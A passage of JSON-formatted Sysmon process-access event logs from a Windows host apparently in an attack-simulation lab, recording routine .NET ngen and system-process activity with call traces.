ramework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7884,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.200\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-131F-5F25-0000-001060D00A00}\r\nTargetProcessId: 4804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.200","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-131F-5F25-0000-001060D00A00}","TargetProcessId":"4804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7885,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.216\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-0010E1F20C00}\r\nTargetProcessId: 4804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.216","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-0010E1F20C00}","TargetProcessId":"4804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7886,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.263\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-132C-5F25-0000-00108D830B00}\r\nTargetProcessId: 484\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.263","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-132C-5F25-0000-00108D830B00}","TargetProcessId":"484","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7887,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.263\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-132C-5F25-0000-00108D830B00}\r\nTargetProcessId: 484\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.263","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-132C-5F25-0000-00108D830B00}","TargetProcessId":"484","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7888,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.263\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-132C-5F25-0000-00108D830B00}\r\nTargetProcessId: 484\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.263","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-132C-5F25-0000-00108D830B00}","TargetProcessId":"484","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7889,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.309\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-0010C7FA0C00}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.309","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-0010C7FA0C00}","TargetProcessId":"4420","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7890,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.309\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-0010C7FA0C00}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.309","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-0010C7FA0C00}","TargetProcessId":"4420","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7891,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.309\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-0010C7FA0C00}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.309","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-0010C7FA0C00}","TargetProcessId":"4420","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\